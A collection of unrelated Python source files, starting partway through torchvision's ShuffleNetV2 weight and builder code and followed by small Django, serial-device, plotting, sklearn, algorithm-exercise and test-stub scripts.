IMAGENET1K_V1 = Weights(
url="https://download.pytorch.org/models/shufflenetv2_x1_5-3c479a10.pth",
transforms=partial(ImageClassification, crop_size=224, resize_size=232),
meta={
**_COMMON_META,
"recipe": "https://github.com/pytorch/vision/pull/5906",
"num_params": 3503624,
"_metrics": {
"ImageNet-1K": {
"acc@1": 72.996,
"acc@5": 91.086,
}
},
"_ops": 0.296,
"_file_size": 13.557,
"_docs": """
These weights were trained from scratch by using TorchVision's `new training recipe
<https://pytorch.org/blog/how-to-train-state-of-the-art-models-using-torchvision-latest-primitives/>`_.
""",
},
)
DEFAULT = IMAGENET1K_V1
class ShuffleNet_V2_X2_0_Weights(WeightsEnum):
IMAGENET1K_V1 = Weights(
url="https://download.pytorch.org/models/shufflenetv2_x2_0-8be3c8ee.pth",
transforms=partial(ImageClassification, crop_size=224, resize_size=232),
meta={
**_COMMON_META,
"recipe": "https://github.com/pytorch/vision/pull/5906",
"num_params": 7393996,
"_metrics": {
"ImageNet-1K": {
"acc@1": 76.230,
"acc@5": 93.006,
}
},
"_ops": 0.583,
"_file_size": 28.433,
"_docs": """
These weights were trained from scratch by using TorchVision's `new training recipe
<https://pytorch.org/blog/how-to-train-state-of-the-art-models-using-torchvision-latest-primitives/>`_.
""",
},
)
DEFAULT = IMAGENET1K_V1
@register_model()
@handle_legacy_interface(weights=("pretrained", ShuffleNet_V2_X0_5_Weights.IMAGENET1K_V1))
def shufflenet_v2_x0_5(
*, weights: Optional[ShuffleNet_V2_X0_5_Weights] = None, progress: bool = True, **kwargs: Any
) -> ShuffleNetV2:
"""
Constructs a ShuffleNetV2 architecture with 0.5x output channels, as described in
`ShuffleNet V2: Practical Guidelines for Efficient CNN Architecture Design
<https://arxiv.org/abs/1807.11164>`__.
Args:
weights (:class:`~torchvision.models.ShuffleNet_V2_X0_5_Weights`, optional): The
pretrained weights to use. See
:class:`~torchvision.models.ShuffleNet_V2_X0_5_Weights` below for
more details, and possible values. By default, no pre-trained
weights are used.
progress (bool, optional): If True, displays a progress bar of the
download to stderr. Default is True.
**kwargs: parameters passed to the ``torchvision.models.shufflenetv2.ShuffleNetV2``
base class. Please refer to the `source code
<https://github.com/pytorch/vision/blob/main/torchvision/models/shufflenetv2.py>`_
for more details about this class.
.. autoclass:: torchvision.models.ShuffleNet_V2_X0_5_Weights
:members:
"""
weights = ShuffleNet_V2_X0_5_Weights.verify(weights)
return _shufflenetv2(weights, progress, [4, 8, 4], [24, 48, 96, 192, 1024], **kwargs)
@register_model()
@handle_legacy_interface(weights=("pretrained", ShuffleNet_V2_X1_0_Weights.IMAGENET1K_V1))
def shufflenet_v2_x1_0(
*, weights: Optional[ShuffleNet_V2_X1_0_Weights] = None, progress: bool = True, **kwargs: Any
) -> ShuffleNetV2:
"""
Constructs a ShuffleNetV2 architecture with 1.0x output channels, as described in
`ShuffleNet V2: Practical Guidelines for Efficient CNN Architecture Design
<https://arxiv.org/abs/1807.11164>`__.
Args:
weights (:class:`~torchvision.models.ShuffleNet_V2_X1_0_Weights`, optional): The
pretrained weights to use. See
:class:`~torchvision.models.ShuffleNet_V2_X1_0_Weights` below for
more details, and possible values. By default, no pre-trained
weights are used.
progress (bool, optional): If True, displays a progress bar of the
download to stderr. Default is True.
**kwargs: parameters passed to the ``torchvision.models.shufflenetv2.ShuffleNetV2``
base class. Please refer to the `source code
<https://github.com/pytorch/vision/blob/main/torchvision/models/shufflenetv2.py>`_
for more details about this class.
.. autoclass:: torchvision.models.ShuffleNet_V2_X1_0_Weights
:members:
"""
weights = ShuffleNet_V2_X1_0_Weights.verify(weights)
return _shufflenetv2(weights, progress, [4, 8, 4], [24, 116, 232, 464, 1024], **kwargs)
@register_model()
@handle_legacy_interface(weights=("pretrained", ShuffleNet_V2_X1_5_Weights.IMAGENET1K_V1))
def shufflenet_v2_x1_5(
*, weights: Optional[ShuffleNet_V2_X1_5_Weights] = None, progress: bool = True, **kwargs: Any
) -> ShuffleNetV2:
"""
Constructs a ShuffleNetV2 architecture with 1.5x output channels, as described in
`ShuffleNet V2: Practical Guidelines for Efficient CNN Architecture Design
<https://arxiv.org/abs/1807.11164>`__.
Args:
weights (:class:`~torchvision.models.ShuffleNet_V2_X1_5_Weights`, optional): The
pretrained weights to use. See
:class:`~torchvision.models.ShuffleNet_V2_X1_5_Weights` below for
more details, and possible values. By default, no pre-trained
weights are used.
progress (bool, optional): If True, displays a progress bar of the
download to stderr. Default is True.
**kwargs: parameters passed to the ``torchvision.models.shufflenetv2.ShuffleNetV2``
base class. Please refer to the `source code
<https://github.com/pytorch/vision/blob/main/torchvision/models/shufflenetv2.py>`_
for more details about this class.
.. autoclass:: torchvision.models.ShuffleNet_V2_X1_5_Weights
:members:
"""
weights = ShuffleNet_V2_X1_5_Weights.verify(weights)
return _shufflenetv2(weights, progress, [4, 8, 4], [24, 176, 352, 704, 1024], **kwargs)
@register_model()
@handle_legacy_interface(weights=("pretrained", ShuffleNet_V2_X2_0_Weights.IMAGENET1K_V1))
def shufflenet_v2_x2_0(
*, weights: Optional[ShuffleNet_V2_X2_0_Weights] = None, progress: bool = True, **kwargs: Any
) -> ShuffleNetV2:
"""
Constructs a ShuffleNetV2 architecture with 2.0x output channels, as described in
`ShuffleNet V2: Practical Guidelines for Efficient CNN Architecture Design
<https://arxiv.org/abs/1807.11164>`__.
Args:
weights (:class:`~torchvision.models.ShuffleNet_V2_X2_0_Weights`, optional): The
pretrained weights to use. See
:class:`~torchvision.models.ShuffleNet_V2_X2_0_Weights` below for
more details, and possible values. By default, no pre-trained
weights are used.
progress (bool, optional): If True, displays a progress bar of the
download to stderr. Default is True.
**kwargs: parameters passed to the ``torchvision.models.shufflenetv2.ShuffleNetV2``
base class. Please refer to the `source code
<https://github.com/pytorch/vision/blob/main/torchvision/models/shufflenetv2.py>`_
for more details about this class.
.. autoclass:: torchvision.models.ShuffleNet_V2_X2_0_Weights
:members:
"""
weights = ShuffleNet_V2_X2_0_Weights.verify(weights)
return _shufflenetv2(weights, progress, [4, 8, 4], [24, 244, 488, 976, 2048], **kwargs)
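# --- Usage sketch (not part of the original module) ---------------------------------
# A minimal example of how these builders are called, assuming torchvision is installed
# and the pretrained weight file can be downloaded:
if __name__ == "__main__":
    model = shufflenet_v2_x1_0(weights=ShuffleNet_V2_X1_0_Weights.IMAGENET1K_V1)
    model.eval()
    with torch.no_grad():
        logits = model(torch.randn(1, 3, 224, 224))  # dummy batch of one RGB image
    print(logits.shape)  # expected: torch.Size([1, 1000])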
|
from django.db import models
from django.contrib.auth.models import User
from questions.managers import QuestionManager
from django.conf import settings
# Create your models here.
class TimeStamp(models.Model):
"""
Reusable Abstract Timestamp Model Class.
"""
    created_at = models.DateTimeField(auto_now_add=True)  # set once, at creation
    updated_at = models.DateTimeField(auto_now=True)      # refreshed on every save
class Meta:
abstract = True
class Question(TimeStamp):
"""
Question model class.
"""
question = models.CharField(max_length=100)
asked_by = models.ForeignKey(
settings.AUTH_USER_MODEL,
on_delete=models.CASCADE,
null=True, blank=True
)
is_answered = models.BooleanField(default=False)
objects = QuestionManager()
def __str__(self):
return self.question
def answered(self):
self.is_answered = True
self.save(update_fields=['is_answered'])
class Answer(TimeStamp):
"""
Answer model Class.
"""
question = models.ForeignKey(
Question,
on_delete=models.CASCADE
)
answer = models.TextField()
    answer_by = models.ForeignKey(
settings.AUTH_USER_MODEL,
on_delete=models.CASCADE,
null=True, blank=True
)
def __str__(self):
return "{}".format(str(self.question))
|
import serial
from datetime import datetime, timedelta
import json
with open('input.json') as doc:
data = json.load(doc)
U_ID = int(data['u_id'], 16)
#ser = serial.Serial('/dev/tty.usbserial-A601D97W') #For Mac
ser = serial.Serial('/dev/ttyUSB0') #For RPi
def connect(params):
mode = params[0]
dev_id = hex(int(params[1]))
ser.write(bytes.fromhex('7e'))
ser.write(mode.encode())
for i in range(0,12):
uid_byte = hex((U_ID >> 8*i) & 0xff)
try:
ser.write(bytes.fromhex(uid_byte[2:]))
except:
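            # bytes.fromhex() rejects odd-length hex strings; pad e.g. 'f' -> '0f'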
ser.write(bytes.fromhex('0'+uid_byte[2:]))
    deadline = datetime.now() + timedelta(seconds=2)
    while ser.in_waiting == 0 and datetime.now() < deadline:
pass
if(ser.in_waiting == 0):
ser.write(bytes.fromhex('00'))
print("No device visible")
return "Sorry! This device is not visible to me."
else:
l = int(ser.read().decode())
while(ser.in_waiting < l):
pass
ack = (ser.read()).decode()
if(ack == 'C'):
try:
#print(dev_id)
ser.write(bytes.fromhex(dev_id[2:]))
#print(bytes.fromhex(dev_id[2:]))
except:
#print("Reached here")
ser.write(bytes.fromhex('0'+dev_id[2:]))
#print(bytes.fromhex('0'+dev_id[2:]))
return "Connected"
ser.flush()
def light(params):
mode = params[0]
dev_id = hex(int(params[1]))
state = hex(int(params[2]))
ser.write(bytes.fromhex('7e'))
ser.write(mode.encode())
for i in range(0,12):
uid_byte = hex((U_ID >> 8*i) & 0xff)
try:
ser.write(bytes.fromhex(uid_byte[2:]))
except:
ser.write(bytes.fromhex('0'+uid_byte[2:]))
try:
ser.write(bytes.fromhex(dev_id[2:]))
except:
ser.write(bytes.fromhex('0'+dev_id[2:]))
try:
ser.write(bytes.fromhex(state[2:]))
except:
ser.write(bytes.fromhex('0'+state[2:]))
if(mode == "L"):
        deadline = datetime.now() + timedelta(seconds=2)
        while ser.in_waiting == 0 and datetime.now() < deadline:
pass
if(ser.in_waiting == 0):
print("Device",params[1],"disconnected.")
return "I can't seem to be abe to talk to device "+params[1]+" right now. Try again!"
else:
l = int(ser.read().decode())
while(ser.in_waiting < l):
pass
ack = (ser.read()).decode()
ser.flush()
print("Success")
return "Voila!"
else:
return "Voila!"
def disconnect(params):
mode = params[0]
dev_id = hex(int(params[1]))
ser.write(bytes.fromhex('7e'))
ser.write(mode.encode())
for i in range(0,12):
uid_byte = hex((U_ID >> 8*i) & 0xff)
try:
ser.write(bytes.fromhex(uid_byte[2:]))
except:
ser.write(bytes.fromhex('0'+uid_byte[2:]))
try:
ser.write(bytes.fromhex(dev_id[2:]))
except:
ser.write(bytes.fromhex('0'+dev_id[2:]))
    deadline = datetime.now() + timedelta(seconds=2)
    while ser.in_waiting == 0 and datetime.now() < deadline:
pass
if(ser.in_waiting == 0):
print("Device not found.")
return "I can't find this device."
else:
l = int((ser.read()).decode())
while(ser.in_waiting < l):
pass
data = (ser.read()).decode()
if(data == "D"):
return "Device disconnected"
def show(params):
mode = params[0]
dev_id = hex(int(params[1]))
state = hex(int(params[2]))
print(dev_id)
print(state)
ser.write(bytes.fromhex('7e'))
ser.write(mode.encode())
for i in range(0,12):
uid_byte = hex((U_ID >> 8*i) & 0xff)
try:
ser.write(bytes.fromhex(uid_byte[2:]))
except:
ser.write(bytes.fromhex('0'+uid_byte[2:]))
try:
print(bytes.fromhex(dev_id[2:]))
ser.write(bytes.fromhex(dev_id[2:]))
print("senttrial")
except:
ser.write(bytes.fromhex('0'+dev_id[2:]))
print("Sent except")
try:
ser.write(bytes.fromhex(state[2:]))
except:
ser.write(bytes.fromhex('0'+state[2:]))
    deadline = datetime.now() + timedelta(seconds=2)
    while ser.in_waiting == 0 and datetime.now() < deadline:
pass
if(ser.in_waiting == 0):
print("Device not found.")
return "I can't communicate with this device right now."
else:
l = int((ser.read()).decode())
while(ser.in_waiting < l):
pass
data = (ser.read()).decode()
if(data == "S"):
return "Here"
|
# -*- coding: utf-8 -*-
"""
Spyder Editor
This is a temporary script file.
"""
import matplotlib.pyplot as plt
from matplotlib.widgets import Slider
import numpy as np
def calc_base(mb,mbc,opbs,opbe,opbc,bid_step,alpha):
x = np.arange(opbs,opbe,bid_step)
y = (x*opbc +mb*mbc)/(mbc+opbc)
y = (y*0.6 + 88)*(1-alpha/100)
return x,y
def calc_score(my_offer,base):
temp = (my_offer - base)*100/base
for i in range(len(temp)):
if temp[i]<0:
temp[i] *= -0.8
ret = (100-temp)*0.6
return ret
my_bid = 216
my_bid_cnt = 3
op_bid_start = 180.0
op_bid_end = 220.0
op_bid_cnt = 2
bid_step = 0.1
alpha = 2
my_offer = 215
op_offer = 180
x,y = calc_base(my_bid,my_bid_cnt,op_bid_start,op_bid_end,op_bid_cnt,bid_step,alpha)
z = calc_score(my_offer,y)
z0 = calc_score(x,y)
#plt
fig = plt.figure()
ax = fig.add_subplot(311)
bx = fig.add_subplot(312)
ax.set_xlabel('op avg bid')
ax.set_ylabel('score')
lineax0, = ax.plot(x,z,label='my_score')
lineax1, = ax.plot(x,z0,label='op_score')
ax.grid()
ax.legend()
bx.set_title("my:%0.2f@%d, op_cnt:%0.2f@%d" % (my_bid,my_bid_cnt,op_offer,op_bid_cnt))
bx.set_xlabel('op avg bid')
bx.set_ylabel('base')
linebx0, = bx.plot(x,y,label='call',color='red')
bx.grid()
target_bid = Slider(plt.axes([0.15, 0.01, 0.7, 0.02]), 'my_offer', valmin=op_bid_start, valmax=op_bid_end, valinit=216.67)
av_bid = Slider(plt.axes([0.15, 0.035, 0.7, 0.02]), 'my_avg_bid', valmin=op_bid_start, valmax=op_bid_end, valinit=214.0)
salpha = Slider(plt.axes([0.15, 0.06, 0.7, 0.02]), 'alpha', valmin=0.8, valmax=2, valinit=0.8)
def update(event):
    # update all artists first, then request a redraw
    x, y = calc_base(av_bid.val, my_bid_cnt, op_bid_start, op_bid_end, op_bid_cnt, bid_step, salpha.val)
    z = calc_score(target_bid.val, y)
    z0 = calc_score(x, y)
    bx.set_title("my:%0.2f@%d, op_cnt:%d" % (av_bid.val, my_bid_cnt, op_bid_cnt))
    lineax0.set_ydata(z)
    lineax1.set_ydata(z0)
    ax.set_ylim(np.min([z, z0]), np.max([z, z0]))
    linebx0.set_ydata(y)
    bx.set_ylim(np.min(y), np.max(y))
    print(np.argmax(z) * bid_step + x[0])
    fig.canvas.draw_idle()
target_bid.on_changed(update)
av_bid.on_changed(update)
salpha.on_changed(update)
plt.show()
|
def sort_array(source_array):
odd = []
for i in range(len(source_array)):
if source_array[i] % 2 == 1:
odd.append(source_array[i])
source_array[i] = "n"
odd.sort()
index = 0
for v in range(len(source_array)):
if source_array[v] == "n":
source_array[v] = odd[index]
index += 1
return source_array
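# Example (added for illustration): odd values are sorted into the positions that held
# odd values, while even values keep their original places.
assert sort_array([5, 3, 2, 8, 1, 4]) == [1, 3, 2, 8, 5, 4]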
|
import modelClass
#from bayes_opt import BayesianOptimization
import GPyOpt
def main():
dataModel = modelClass.modelClass()
dataModel.loadDataSequence()
domain = [{'name': 'nCNN','type':'discrete','domain':tuple(range(1,6))},
{'name': 'nDense','type':'discrete','domain':tuple(range(0,3))},
{'name': 'nEmbedding','type':'discrete','domain':tuple(range(5,200))},
{'name': 'nCNNFilters','type':'discrete','domain':tuple(range(2,1000))},
{'name': 'nNNFilters','type':'discrete','domain':tuple(range(3,1000))},
{'name': 'nKernel','type':'discrete','domain':tuple(range(1,4))},
{'name': 'nStrides','type':'discrete','domain':tuple(range(1,2))},
{'name': 'poolSize','type':'discrete','domain':tuple(range(1,2))}]
optimizer = GPyOpt.methods.BayesianOptimization(
dataModel.optimizeCNN,
        domain=domain
)
max_iter = 20
optimizer.run_optimization(max_iter)
print(optimizer.x_opt)
if __name__ == "__main__":
main()
|
import pandas as pd
import numpy as np
import os
# Import models
from sklearn.linear_model import LogisticRegression
from sklearn.tree import DecisionTreeClassifier
from sklearn.neighbors import KNeighborsClassifier
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis
from sklearn.naive_bayes import GaussianNB
from sklearn.svm import SVC
## Read in the data, select the columns of interest
## All Columns == 'PassengerId', 'Pclass', 'Name', 'Sex', 'Age', 'SibSp', 'Parch', 'Ticket', 'Fare', 'Cabin', 'Embarked'
test_data = pd.read_csv('test.csv',
usecols = ['PassengerId',
'Pclass',
'Sex',
'Age',
'SibSp',
'Parch',
'Fare']
)
train_data = pd.read_csv('train.csv',
usecols = ['PassengerId',
'Survived',
'Pclass',
'Sex',
'Age',
'SibSp',
'Parch',
'Fare']
)
# Does randomising the data make any difference?
test_data = test_data.sample(frac=1).reset_index(drop=True)
train_data = train_data.sample(frac=1).reset_index(drop=True)
## Preprocessing the data, ensure values are usable and remove NaN values
train_data['Sex'] = train_data['Sex'].map({'female':0,'male':1})
test_data['Sex'] = test_data['Sex'].map({'female':0,'male':1})
age_mean_train = train_data['Age'].mean()
age_mean_test = test_data['Age'].mean()
train_data['Age'].fillna(age_mean_train,
inplace=True)
test_data['Age'].fillna(age_mean_test,
inplace=True)
train_data.loc[(train_data['Age'] < 16),'Age_cat'] = 'C'
train_data.loc[(train_data['Age'] >= 16),'Age_cat'] = 'A'
#train_data.loc[(train_data['Age'].isnull()),'Age_cat'] = 'U'
test_data.loc[(test_data['Age'] < 16),'Age_cat'] = 'C'
test_data.loc[(test_data['Age'] >= 16),'Age_cat'] = 'A'
#test_data.loc[(test_data['Age'].isnull()),'Age_cat'] = 'U'
train_data.drop(columns='Age',
inplace=True)
test_data.drop(columns='Age',
inplace=True)
train_data.loc[(train_data['Fare'].isnull()), 'Fare'] = 0
test_data.loc[(test_data['Fare'].isnull()), 'Fare'] = 0
train_data = pd.get_dummies(train_data,
columns=['Age_cat'],
prefix = ['Age_cat'])
test_data = pd.get_dummies(test_data,
columns=['Age_cat'],
prefix = ['Age_cat'])
## Split the data to train and test data and convert to array
X_train = train_data.drop(columns=['Survived', 'PassengerId']).to_numpy()
y_train = train_data['Survived'].to_numpy()
X_test = test_data.drop(columns='PassengerId').to_numpy()
## Decision Tree
dtc = DecisionTreeClassifier()
model = dtc.fit(X_train, y_train)
dtc_y_pred = model.predict(X_test)
dtc_y_pred_df = pd.DataFrame(dtc_y_pred).rename(columns={0:'Survived'})
print(f'Accuracy of DT classifier on training set: {model.score(X_train, y_train):.2f}')
print(f'Accuracy of DT classifier on test set: {model.score(X_test, dtc_y_pred):.2f}')
result = test_data.merge(dtc_y_pred_df, how = 'left', left_index = True, right_index = True)
submission = result[['PassengerId', 'Survived']].to_csv('result.csv', index = False)
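# A rough sanity check (not in the original script): because the Kaggle test set has no
# labels, the "test set" score above compares predictions with themselves and is always
# 1.0; cross-validation on the training data gives a more honest estimate. Sketch,
# assuming scikit-learn is available:
from sklearn.model_selection import cross_val_score
cv_scores = cross_val_score(DecisionTreeClassifier(), X_train, y_train, cv=5)
print(f'5-fold CV accuracy: {cv_scores.mean():.2f} +/- {cv_scores.std():.2f}')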
|
#!/usr/bin/env python
def fib(x):
    if not isinstance(x, int):
        raise TypeError("Integer required")
    if x < 0:
        raise ValueError("Negative values are not allowed")
if x in [0, 1]:
return 1
return fib(x - 1) + fib(x - 2)
def iter_fib(x):
prev = [0, 0]
    for i in range(0, x):
if i == 0:
val = 1
else:
val = sum(prev)
        print(i, val)
prev = [prev[1], val]
def iter_pas_tr(x):
    for i in range(x):
if i == 0:
val = [1]
prev = [1]
else:
v1 = [0] + prev
v2 = prev + [0]
val = v1
            for j in range(len(prev) + 1):
val[j] = v1[j] + v2[j]
prev = val
        print(i, val)
iter_fib(40)
iter_pas_tr(15)
|
from django.views.generic import TemplateView
from django.shortcuts import render
from django.core.serializers import serialize
from django.http import HttpResponse
from .models import Stations
class HomePageView(TemplateView):
template_name = 'stations/index.html'
def stations_dataset(request):
stations = serialize('geojson', Stations.objects.all())
    return HttpResponse(stations, content_type='application/json')
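# A minimal wiring sketch (hypothetical urls.py, not part of this file):
#
#     from django.urls import path
#     from .views import HomePageView, stations_dataset
#
#     urlpatterns = [
#         path('', HomePageView.as_view(), name='home'),
#         path('stations_data/', stations_dataset, name='stations_data'),
#     ]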
|
from _typeshed import Incomplete
def maximal_independent_set(
G, nodes: Incomplete | None = None, seed: Incomplete | None = None
): ...
|
# -*- coding: utf-8 -*-
class Solution:
def countSubstrings(self, s):
return sum((el + 1) // 2 for el in self.manachersAlgorithm(s))
def manachersAlgorithm(self, s):
c, r = 0, 0
s = "^#" + "#".join(s) + "#$"
p = [0] * len(s)
for i in range(1, len(s) - 1):
if i < r:
p[i] = min(r - i, p[2 * c - i])
while s[i + 1 + p[i]] == s[i - 1 - p[i]]:
p[i] += 1
            if i + p[i] > r:
                c, r = i, i + p[i]
return p
if __name__ == "__main__":
solution = Solution()
assert 3 == solution.countSubstrings("abc")
assert 6 == solution.countSubstrings("aaa")
|
# -*- coding:utf-8 -*-
from zope.interface import implements, Interface
from zope.component import getUtility, getMultiAdapter
from zope.component.interfaces import IObjectEvent
from sc.newsletter.creator.tests.base import TestCase
from Products.PloneTestCase.setup import default_user
from DateTime import DateTime
class DummyEvent(object):
implements(IObjectEvent)
def __init__(self, object):
self.object = object
class TestPackage(TestCase):
def afterSetUp(self):
self.loginAsPortalOwner()
# Create objects to be used in test
self.portal.invokeFactory('Folder', 'foo')
def testSomething(self):
self.assertEquals(1, 1)
def test_suite():
from unittest import TestSuite, makeSuite
suite = TestSuite()
suite.addTest(makeSuite(TestPackage))
return suite
|